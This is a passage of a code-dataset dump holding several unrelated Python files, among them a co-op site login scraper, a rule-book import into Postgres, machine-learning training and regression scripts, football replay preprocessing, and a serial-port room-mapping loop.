Creating new one\")\n self.session = requests.Session()\n self._login()\n else:\n self.session = session\n logger.info(\"Session from DB still works\")\n\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n with shelve.open(self.DB_PATH) as db:\n if not self.keep_session_alive:\n if self.SESSION_KEY in db:\n del db[self.SESSION_KEY]\n self.session.close()\n else:\n db[self.SESSION_KEY] = self.session\n\n def _login(self) -> None:\n site = self.session.get(f\"{BASE_URL}{LOGIN_URL}\")\n bs_content = BeautifulSoup(site.content, \"html.parser\")\n token = bs_content.find(\"input\", {\"name\": CSRF_KEY})[\"value\"]\n login_data = {\n \"username\": self.username,\n \"password\": self.password,\n \"csrfmiddlewaretoken\": token,\n \"Submit\": \"Log In\",\n \"next\": \"\",\n }\n self.session.headers.update(\n {\n \"Referer\": \"https://members.foodcoop.com/services/login/\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Connection\": \"keep-alive\",\n }\n )\n login_resp = self.session.post(f\"{BASE_URL}{LOGIN_URL}\", login_data)\n logger.info(f\"Login status code response was: {login_resp.status_code}\")\n\n @classmethod\n def get_shifts_page_dom(cls, s: requests.Session, page: int) -> BeautifulSoup:\n today_date = datetime.date.today().strftime(\"%Y-%m-%d\")\n shifts_page = s.get(\n f\"{BASE_URL}{SHIFTS_URL}/{page}/{EXTRA_DATA_URL}{today_date}\"\n )\n return BeautifulSoup(shifts_page.content, \"html.parser\")\n\n @classmethod\n def _does_session_still_work(cls, s: requests.Session) -> bool:\n shifts_dom = cls.get_shifts_page_dom(s, 0)\n shift_text = shifts_dom.find(text=\"Shift Calendar\")\n return bool(shift_text)\n","repo_name":"jroth125/coop_shifter","sub_path":"src/coop_session.py","file_name":"coop_session.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"75188465733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 12 14:56:00 2022\n\nRetraining Models with the possibility of masking (lottery ticket)\n\n@author: YFGI6212\n\"\"\"\n\nimport sys\n\nsys.path.append(\"../\")\nsys.path.append(\"../../\")\n\n\nimport torch\n\nfrom models.cae_32x32x32_zero_pad_comp import CAE\nfrom models.masked_models import Masked_CAE\n\n\ndef load_projected_model(\n model_file=None, initial_model_file=None, projection=None, projection_params=None\n):\n \"\"\"\n model: typically the mest model of an experiment\n \n # Load the model\n 1 - load model \n # Project the model and generates the corresponding masks\n 2 - model2 = model.project(projection, projection_params)\n # Load the state of a second model (typically an initial model in model2\n # Model2 is then masked and can be retrained\n 3 - model2.state_dict() = initial_model.state_dict()\n # Apply the mask on the re-initialised weights of the model\n 4 - model2.apply_mask_on_layers()\n 4 - return the masked model2\n \"\"\"\n\n new_model = Masked_CAE()\n\n save_dict = torch.load(model_file, map_location=\"cpu\")\n\n new_model.load_state_dict(save_dict[\"model_state_dict\"])\n\n new_model.project(projection, projection_params) # create masks\n\n masks = new_model._masks\n\n save_dict = torch.load(initial_model_file, map_location=\"cpu\")\n\n new_model.load_state_dict(save_dict[\"model_state_dict\"])\n\n new_model._masks = masks\n new_model.apply_masks_on_layers()\n\n return 
new_model\n\n","repo_name":"CyprienGille/Sparse-Convolutional-AutoEncoder","sub_path":"functions/retrain_model.py","file_name":"retrain_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"361335199","text":"import psycopg2\nimport sys\nimport os\nimport csv\nimport datetime\nimport re\n\nconn = psycopg2.connect(\"dbname=school_crm user=postgres host=localhost port=5433\")\ncur = conn.cursor()\n\ncur.execute(\"DELETE from entry\")\ncur.execute(\"DELETE from section\")\ncur.execute(\"DELETE from chapter\")\ncur.execute(\"set client_encoding to 'latin1'\")\n\nchapter_id = None\nsection_id = None\nrule_content = \"\"\nrule_num = \"\"\nrule_title = \"\"\n\nfor line in open(sys.argv[1], 'r'):\n\tchapter_match = re.match(\"Section (\\d): (.*)\", line)\n\trule_match = re.match(\"\\d.(\\d\\d) (.*)\", line)\n\t\n\tif chapter_match or rule_match:\n\t\tif rule_num and rule_title and rule_content:\n\t\t\tcur.execute(\"INSERT into entry(num, title, section_id, content) VALUES (%s, %s, %s, %s)\", (\n\t\t\t\trule_num, rule_title, section_id, rule_content))\n\t\trule_num = rule_title = rule_content = \"\"\n\t\n\tif chapter_match:\n\t\tcur.execute(\"INSERT into chapter (num, title) VALUES (%s, %s) returning id\", (\n\t\t\tchapter_match.group(1) + \"0\", chapter_match.group(2)))\n\t\tchapter_id = int(cur.fetchone()[0])\n\t\t\n\t\tcur.execute(\"INSERT into section(num, title, chapter_id) VALUES (%s, %s, %s) returning id\", (\n\t\t\t\"0\", \"All entries\", chapter_id))\n\t\tsection_id = int(cur.fetchone()[0])\n\t\t\n\telif rule_match:\t\n\t\trule_num = rule_match.group(1)\n\t\trule_title = rule_match.group(2)\n\telse:\n\t\trule_content += line\n\nconn.commit()\ncur.close()\nconn.close()\n","repo_name":"schmave/demschooltools","sub_path":"import_rule_book.py","file_name":"import_rule_book.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"673864870","text":"from sys import stdin\r\n\r\nn, k = map(int, stdin.readline().split())\r\nlevel_list = sorted([int(stdin.readline()) for _ in range(n)])\r\n\r\ndef available(remain_level, dest):\r\n for element in level_list:\r\n if element >= dest:\r\n break\r\n remain_level -= (dest - element)\r\n if remain_level < 0:\r\n return False\r\n return True\r\n\r\nleft, right, answer = level_list[0], level_list[0] + k, 0\r\n\r\nwhile left <= right:\r\n mid = (left + right) // 2\r\n if available(k, mid):\r\n answer = mid\r\n left = mid + 1\r\n else:\r\n right = mid - 1\r\nprint(answer)","repo_name":"WhalesBob/AlgorithmSolving","sub_path":"백준/Silver/16564. 
히오스 프로게이머/히오스 프로게이머.py","file_name":"히오스 프로게이머.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29317146267","text":"import sys\nimport pandas as pd\nimport statsmodels.formula.api as smf\n\n\nrf, scorefile = sys.argv[1:]\n\ndm_phenos = pd.read_csv(\"../data/processed/gen3/whi_white_DM_phenos.txt\", sep=\" \")\n\nwhi_sample_to_subject = (pd.read_csv(\"../data/raw/whi/sample_info.txt\", sep=\"\\t\", skiprows=15)\n\t\t\t .rename({'SampleID': 'sampleID', 'SubjectID': 'subjID'}, axis=1)\n\t\t\t .filter(['sampleID', 'subjID']))\n\nscores = (pd.read_csv(scorefile, delim_whitespace=True)\n\t .rename({'IID': 'sampleID', 'SCORE': 'score'}, axis=1)\n\t .merge(whi_sample_to_subject, on=\"sampleID\")\n\t .merge(dm_phenos, on=\"subjID\"))\n\nscores = scores.assign(delta_bmi = lambda x: x.delta_bmi.clip(lower=-5, upper=5),\n\t\t delta_sbp = lambda x: x.delta_sbp.clip(lower=-30, upper=30),\n\t\t delta_glu = lambda x: x.delta_glu.clip(lower=-40, upper=40),\n\t\t delta_ldl = lambda x: x.delta_ldl.clip(lower=-60, upper=40),\n\t\t delta_tg = lambda x: x.delta_tg.clip(lower=-75, upper=75))\nprint(smf.ols(f'delta_{rf} ~ score', data=scores.query('dm_intervention == True')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score', data=scores.query('dm_intervention == True & delta_sfa < delta_sfa.quantile(0.5)')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score + baseline_{rf}', data=scores.query('dm_intervention == True')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score * dm_intervention', data=scores).fit().summary().tables[1])\n","repo_name":"kwesterman/whi-diet-response","sub_path":"scripts/archive/test_score_DM.py","file_name":"test_score_DM.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12482114824","text":"### !!!!!!!!!!!!!!!!!!! 
Do not delete this cell !!!!!!!!!!!!!!!!!!!\nimport os\nfrom tqdm import tqdm\nimport pickle\nimport time\nimport numpy as np\nfrom gfootball.env.wrappers import Simple115StateWrapper\n\n# Here we will write the pickle files\ndef prepare_npy_dataset_from_replay_files(replay_files, replay_files_path):\n obs_save_dir = '/home/ssk/Study/GRP/dataset/npy_files'\n # replay_files_path = 'dataset/replay_files'\n\n if not os.path.exists(obs_save_dir):\n os.mkdir(obs_save_dir)\n\n for replay in tqdm(replay_files):\n with open(os.path.join(replay_files_path, replay), 'rb') as pkl_file:\n episode_data = pickle.load(pkl_file)\n\n episode_no = replay.split('.')[0]\n episode = episode_data['observations']\n episode['active'] = episode_data['players'][0]['active']\n episode_length = 3002\n raw_obs = {}\n\n episode_dir = os.path.join(obs_save_dir, episode_no)\n if not os.path.exists(episode_dir):\n os.mkdir(episode_dir)\n\n for step in range(episode_length):\n for (key, item) in episode.items():\n raw_obs[key] = item[step]\n\n float115_frame = Simple115StateWrapper.convert_observation([raw_obs], True)[0].tolist()\n action = episode_data['players'][0]['action'][step]\n \n frame_name = episode_no+f'_{step}'\n if len(action) != 0:\n float115_frame.extend(action)\n fram_save_path = os.path.join(episode_dir, frame_name)\n np.save(fram_save_path, np.array(float115_frame))\n\n\n\nif __name__=='__main__':\n replay_files_path = 'dataset/replay_files'\n replay_files = sorted(os.listdir(replay_files_path))\n replay_files.pop(0)\n # replay_files = replay_files[0:1]\n print(f\"total replay files: {len(replay_files)}\")\n # replay_files = replay_files[0:1]\n\n start = time.perf_counter()\n prepare_npy_dataset_from_replay_files(replay_files, replay_files_path)\n end = time.perf_counter()\n\n print(f\"Total time needed to process {len(replay_files)}: {end-start}s\")\n print(f\"Time needed to process a single file: {(end-start)/len(replay_files)}s\")","repo_name":"siyamsajeebkhan/gr_football_analytics","sub_path":"utils/create_single_obs_files.py","file_name":"create_single_obs_files.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11891659830","text":"from sklearn import linear_model\nfrom sklearn.preprocessing import PolynomialFeatures\nimport pandas as pd\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n#Reading and spliting data into test and train\ndf = pd.read_csv(\"kc_house_data.csv\")\ntrain_data,test_data = train_test_split(df,train_size=0.8,random_state=3)\n\nfeatures = [ 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors',\n 'waterfront', 'view', 'condition', 'grade', 'sqft_above',\n 'sqft_basement', 'yr_built', 'yr_renovated', 'zipcode', 'lat', 'long',\n 'sqft_living15', 'sqft_lot15' ]\nX_train = np.array(train_data[features])\nY_train = np.array(train_data['price'])\n\nX_test = np.array(test_data[features])\nY_test = np.array(test_data['price'])\n\n\n#===============================Linear Models============================\n#Simple multiple linear regression\nlr = linear_model.LinearRegression()\n\n#Ridge Regression\nR_lr1 = linear_model.Ridge(alpha=1)\nR_lr2 = linear_model.Ridge(alpha=10)\n\n#Lasso Regression\nL_r1 = linear_model.Lasso(alpha=1)\nL_r2 = linear_model.Lasso(alpha=10)\n\n\n#Polynomial Regression\npolyfeat = PolynomialFeatures(degree=2)\nX_all_feat_poly = 
polyfeat.fit_transform(df[features])\nX_trainpoly = polyfeat.fit_transform(train_data[features])\nX_testpoly = polyfeat.fit_transform(test_data[features])\n\n\n#=========================Fitting==============================\nlr.fit(X_train,Y_train)\n\nR_lr1.fit(X_train,Y_train)\nR_lr2.fit(X_train,Y_train)\n\nL_r1.fit(X_train,Y_train)\nL_r2.fit(X_train,Y_train)\n\npoly = linear_model.LinearRegression().fit(X_trainpoly, train_data['price'])\n\n#======================prediction==================================\nlr_pred = lr.predict(X_test)\n\nR_lr1_pred = R_lr1.predict(X_test)\nR_lr2_pred = R_lr2.predict(X_test)\n\nL_r1_pred = L_r1.predict(X_test)\nL_r2_pred = L_r2.predict(X_test)\n\nPoly_pred = poly.predict(X_testpoly)\n\n#============================Model acuaracy============================\n#Multiple regression\nprint(\"Multiple regression\")\nlr_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,lr_pred)),'.3f'))\nprint(\"Mean squared error:\",lr_MSR)\nprint(\"\")\n\n#Ridge regression\nprint(\"Ridge regression\")\nR_lr1_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,R_lr1_pred)),'.3f'))\nprint(\"Mean squared error for alpha=1:\",R_lr1_MSR)\n\nR_lr2_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,R_lr2_pred)),'.3f'))\nprint(\"Mean squared error for alpha=100:\",R_lr2_MSR)\nprint(\"\")\n\n#Lasso regressio\nprint(\"Lasso regression\")\nL_r1_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,L_r1_pred)),'.3f'))\nprint(\"Mean squared error for alpha=1:\",L_r1_MSR)\n\nL_r2_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,L_r2_pred)),'.3f'))\nprint(\"Mean squared error for alpha=100:\",L_r2_MSR)\nprint(\"\")\n\n#Polynomial regression\nprint(\"Polynomial regression\")\nPoly_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,Poly_pred)),'.3f'))\nprint(\"Mean squared error for degree=2:\",Poly_MSR)\n","repo_name":"Thehunk1206/EDA-and-Regression-Analysis","sub_path":"Regression/Regression_analysis.py","file_name":"Regression_analysis.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23509070340","text":"import time\nfrom SerialHandler import *\nfrom MapHandler import *\nfrom HTTPHandler import *\n\nplotHost = '192.168.1.129'\nplotPort = '5000'\n\nserialHandler = SerialHandler()\nmapHandler = MapHandler()\nhttpHandler = HTTPHandler(plotHost, plotPort)\n\n# Center Distance 140 + or - 2\n\nwhile True:\n i = 50;\n while i < 231:\n # Measurement command test\n print(\"------------------------------\")\n print(\"Requesting measurement at angle of\", end=' ')\n print(i, end='')\n print(\"...\")\n distance = serialHandler.getDistance(i)\n if(distance < 0):\n if(distance == -1):\n print(\"Error! 
Angle measurement invalid\")\n serialHandler.resetSensorMotor()\n i -= 10\n else:\n print(\"Error, no response from Arduino\")\n exit(1)\n i -= 10\n else:\n print(\"Response Distance: \" + str(distance))\n if(distance > 200):\n mapHandler.updateValue( i // 10, -1000)\n else:\n mapHandler.updateValue( i // 10, distance)\n print(\"------------------------------\")\n time.sleep(0.2)\n i += 10\n\n ## Movement command test\n #print(\"------------------------------\")\n #print(\"Sending Movement...\")\n #res = serialHandler.sendMovement(1.0)\n #if(res):\n # print(\"Success!\")\n #else:\n # print(\"Failed!\")\n #print(\"------------------------------\")\n #time.sleep(3)\n \n ## Rotation command test\n #print(\"------------------------------\")\n #print(\"Sending rotation...\")\n #res = serialHandler.sendRotation(3.0)\n #if(res):\n # print(\"Success!\")\n #else:\n # print(\"Failed!\")\n #print(\"------------------------------\")\n #time.sleep(3)\n # mapHandler.print()\n httpHandler.sendMap(mapHandler.getMap()) \n\n","repo_name":"rakane/RoomMapping","sub_path":"Beaglebone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35497814007","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\nfrom src.utils_freq import batch_dct, dct, idct, getDCTmatrix\n\nfrom collections import defaultdict\nfrom tqdm import trange\nimport ipdb\n\nfrom torch.utils.data import DataLoader, TensorDataset\n\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndef loader_LR(case, p, d, batchsize, mu, std, lambbda, iteration):\n \n total_size = batchsize*iteration\n \n x, y = data_init_LR(case, p, d, total_size, mu, std, lambbda)\n dataset = TensorDataset(x.t(), y.t())\n loader = DataLoader(dataset, batch_size = batchsize, pin_memory = True, shuffle=True)\n \n return loader\n\ndef data_init_LR(case = 1, p = 3, d = 10, total_size = 100000, mu = 1, std = 0.5, lambbda = 1):\n \n x_tilde = torch.zeros(d, total_size)\n y = torch.zeros(total_size)\n \n x_tilde[:p, :int(total_size/2)] = torch.normal(mean = mu, std = std, size = (p,int(total_size/2)))\n y[:int(total_size/2)] = 0\n \n x_tilde[:p, int(total_size/2):] = torch.normal(mean = -mu, std = std, size = (p,int(total_size/2)))\n y[int(total_size/2):] = 1\n\n if case ==1:\n x_tilde[p:,:] = 0\n elif case ==2:\n rand_sign = torch.rand_like(x_tilde[p:,:])-0.5\n rand_sign = (rand_sign/rand_sign.abs()).detach()\n x_tilde[p:,:] = torch.normal(mean = mu, std = std, size = (d-p,total_size)) * rand_sign\n elif case == 3:\n rand_sign = torch.rand_like(x_tilde[p:,:])-0.5\n rand_sign = (rand_sign/rand_sign.abs()).detach()\n x_tilde[p:,:] = torch.normal(mean = mu, std = std, size = (d-p,total_size)) * rand_sign\n decay = torch.exp(-lambbda*(torch.range(1, d-p))).view(d-p,1).repeat(1, total_size)\n x_tilde[p:,:] = x_tilde[p:,:] * decay\n\n x = idct(x_tilde)\n return x, y\n\ndef train_LR(args, model, opt, device):\n \n iteration = args[\"itr\"]\n _d = args[\"d\"]\n _p = args[\"p\"]\n _case = args[\"case\"]\n _batchsize = args[\"bsize\"]\n _mu = args[\"mu\"]\n _std = args[\"std\"]\n _lambbda = args[\"lambbda\"]\n _lr = args['lr']\n _method = args['method']\n \n log_dict = defaultdict(lambda: list())\n \n w_tilde = torch.zeros(_d, iteration, device = device)\n loss_logger = torch.zeros(1, iteration, device = device)\n acc_logger = torch.zeros(1, 
iteration, device = device)\n \n \n train_loader = loader_LR(_case, _p, _d, _batchsize, _mu, _std, _lambbda, iteration)\n \n dct_matrix = getDCTmatrix(_d)\n \n i = 0\n for x, y in train_loader:\n \n prev_w_tilde = dct(model.state_dict()['linear.weight'].view(_d,1)).squeeze().detach()\n\n x, y = x.t().to(device), y.t().to(device)\n \n if torch.isnan(x).sum().item() != 0:\n print(\"NaN detected in data: removed\", torch.isnan(x).sum().item(), \"datapoints\")\n nonNan_idx = torch.tensor(torch.isnan(x).sum(dim=0)==0, dtype = torch.bool)\n x = x[:,nonNan_idx]\n y = y[nonNan_idx]\n \n opt.zero_grad()\n\n z = model(x).view(y.shape)\n y_hat = torch.sigmoid(z)\n \n loss = torch.nn.BCEWithLogitsLoss()(z, y)\n \n batch_correct = ((z > 0) == (y==1)).sum().item()\n batch_acc = batch_correct /x.shape[1]*100\n\n loss_logger[:,i] = loss.item()\n acc_logger[:,i] = batch_acc\n\n if _method == 'weighted_l1f':\n factor = args['factor']\n# ipdb.set_trace()\n curr_w = model.linear.weight.t()\n curr_w_tilde = dct(curr_w)\n \n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(1,_d)\n \n weighted_w_tilde = torch.mul(M, curr_w_tilde).squeeze()\n \n l1_reg = torch.norm(weighted_w_tilde,p=1)\n \n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n elif _method == 'l1f':\n factor = args['factor']\n# ipdb.set_trace()\n curr_w = model.linear.weight.t()\n curr_w_tilde = dct(curr_w)\n \n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(1,_d)\n M = torch.ones_like(M, device =device)\n \n weighted_w_tilde = torch.mul(M, curr_w_tilde).squeeze()\n \n l1_reg = torch.norm(weighted_w_tilde,p=1)\n \n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n elif _method == 'l1s':\n factor = args['factor']\n curr_w = model.linear.weight.squeeze()\n l1_reg = torch.norm(curr_w,p=1)\n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n else:\n loss.backward()\n curr_w = model.linear.weight.clone().detach()\n grad = model.linear.weight.grad.clone().detach()\n if _method == 'weighted_lr':\n dct_grad = dct(grad.t())\n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(_d, 1)\n # M = M/M[0]\n # M = torch.ones_like(M, device = x.device) # for sanity check\n new_w = curr_w - idct(_lr * torch.mul(M,dct_grad)).t()\n else:\n new_w = curr_w - _lr * grad\n\n model.linear.weight = torch.nn.parameter.Parameter(new_w)\n \n curr_w_tilde = dct(model.state_dict()['linear.weight'].view(_d,1)).squeeze().detach()\n\n w_tilde[:,i] = curr_w_tilde\n \n i += 1\n \n log_dict[\"w_tilde\"] = w_tilde\n log_dict[\"loss\"] = loss_logger\n log_dict[\"acc\"] = acc_logger\n \n return log_dict\n\n# def loss_under_attack(args, model, device):\n \n# loss_adv = torch.zeros(3, device = device) # 3 types of attacks\n# _d = args[\"d\"]\n# _case = args[\"case\"]\n# _batchsize = args[\"bsize\"]\n# _mu = args[\"mu\"]\n# _std = args[\"std\"]\n# _lambbda = args[\"lambbda\"]\n# _lr = args[\"lr\"]\n# _eps = args[\"eps\"]\n \n# x, y = data_init_LR(_case, _d, _batchsize, _mu, _std, _lambbda) \n# x, y = x.to(device), y.to(device)\n \n \n# y_hat = model(x)\n# r = (y_hat.t() - y)\n \n# w = 
model.state_dict()['linear.weight'].squeeze().detach()\n# w_tilde = dct(w.view(_d,1)).detach()\n \n\n# # #attack 1: all k's\n# # delta_x_1_tilde = _eps * torch.sign(r) * w_tilde / torch.norm(w_tilde).detach()\n# # delta_x_1 = idct(delta_x_1_tilde)\n# # y_adv_1 = model(x+delta_x_1)\n# # loss_1 = ((1/2) * (y_adv_1.t() - y) ** 2).mean().item()\n \n# # #attack 2: highest k\n# # attack_k = torch.ones(_d, device = device)\n# # attack_k[0:-1] = 0\n# # V = torch.diag(attack_k)\n# # V_w_tilde = torch.mm(V, w_tilde)\n# # delta_x_2_tilde = _eps * torch.sign(r) * V_w_tilde / torch.norm(V_w_tilde).detach()\n# # delta_x_2 = idct(delta_x_2_tilde)\n# # y_adv_2 = model(x+delta_x_2)\n# # loss_2 = ((1/2) * (y_adv_2.t() - y) ** 2).mean().item()\n \n# #attack 3: k != 0\n# attack_k = torch.ones(_d, device = device)\n# attack_k[0] = 0\n# V = torch.diag(attack_k)\n# V_w_tilde = torch.mm(V, w_tilde)\n# # ipdb.set_trace()\n# # if _case == 1:\n# # print(w_tilde)\n# delta_x_3_tilde = _eps * torch.sign(r) * V_w_tilde / torch.norm(V_w_tilde).detach()\n# delta_x_3 = idct(delta_x_3_tilde)\n# y_adv_3 = model(x+delta_x_3)\n# loss_3 = ((1/2) * (y_adv_3.t() - y) ** 2).mean().item()\n \n \n# loss_adv[0], loss_adv[1], loss_adv[2] = 0, 0, loss_3\n \n# return loss_adv\n \n# def plot_loss_LR(log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n# loss_var, loss_mean = torch.var_mean(log, dim = 1) \n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(log.shape[0]) \n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n \n# for i in range(log.shape[2]):\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, i], color = \"C\"+str(i), label = \"case \"+str(i+1), linewidth=3.0, marker = \"\")\n# fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n \n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! 
(loss plot)\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n \n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.add_subplot(gs[0,0]).set_title(\"loss\",fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n# def plot_risk_LR(args, w_tilde_log, loss_log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n# _std = args[\"std\"]\n# _lr = args[\"lr\"]\n# _d = args[\"d\"]\n# _lambbda = args[\"lambbda\"]\n \n# w_tilde_log_copy = w_tilde_log.clone().detach()\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n# loss_var, loss_mean = torch.var_mean(loss_log, dim = 1) \n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(loss_log.shape[0]) \n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n \n# for i in range(loss_log.shape[2]):\n# # for i in [2]:\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, i], color = \"C\"+str(i), label = \"case \"+str(i+1), linewidth=3.0, marker = \"\")\n# fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n \n# if i == 0: # case 1\n# e_0 = w_tilde_log_copy[0,0,:,0] - 1 # only supports numb_runs = 1, so error will occur if we do average over multiple runs\n# risk = 0.5 * e_0**2 * _std**2 * torch.tensor(1 - 2*_lr*_std**2 + 3*_lr**2*_std**4)**torch.tensor(xrange)\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n# elif i == 1: # case 2\n# e_0 = w_tilde_log_copy[:,0,:,1] # only supports numb_runs = 1, so error will occur if we do average over multiple runs\n# e_0[0] = e_0[0] - 1\n# risk = 0.5 * torch.norm(e_0, p =2)**2 * _std**2 * torch.tensor(1 - 2*_lr*_std**2 + 3*_lr**2*_std**4)**torch.tensor(xrange)\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n# elif i ==2: # case 3\n# e_i = w_tilde_log_copy[:,0,:,2]\n# e_i[0] -= 1\n# # ipdb.set_trace()\n# bracket_term = [np.exp(-2*d*_lambbda)*torch.tensor(1 - 2 * _lr * _std**2 * np.exp(-2*d*_lambbda) + 3 * _lr**2 * _std**4 * np.exp(-4*d*_lambbda))**torch.tensor(xrange) for d in range(_d)]\n# sum_term = torch.stack(bracket_term).T @ (torch.tensor(e_i)**2)\n# risk = 0.5 * _std**2 * sum_term\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n\n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! 
(loss plot)\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n \n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.add_subplot(gs[0,0]).set_title(\"loss\",fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n\n \n# def plot_w_tilde_LR(log, threshold = 1e-3):\n \n# THRESHOLD = threshold\n \n# fig = plt.figure(figsize = [15,15])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(10,1)\n \n# w_tilde_log = log.clone().detach()\n# w_tilde_log[0,:,:,:] = w_tilde_log[0,:,:,:]-1\n \n# w_tilde_diff_var, w_tilde_diff_mean = torch.var_mean(w_tilde_log, dim = 2, unbiased = True)\n\n# xrange = np.arange(log.shape[1])\n \n# w_tilde_diff_below_threshold = w_tilde_diff_mean.abs() < THRESHOLD\n \n# for i in range(log.shape[3]):\n# for j in range(10):\n# fig.add_subplot(gs[j,0]).plot(w_tilde_diff_mean[j,:,i], color = \"C\"+str(i), label = \"case \" + str(i+1), linewidth=3.0, marker = \"\")\n# # fig.add_subplot(gs[j,0]).fill_between(xrange, fill_up[j,:,i-1], fill_low[j,:,i-1], color = \"C\"+str(i), alpha=0.3)\n# try:\n# fig.add_subplot(gs[j,0]).axvline(x=w_tilde_diff_below_threshold[j,:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! (w_tilde plot) \", i, j)\n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10}) \n# fig.add_subplot(gs[0,0]).set_title(\"$\\~e(k)$\",fontsize = 20)\n# 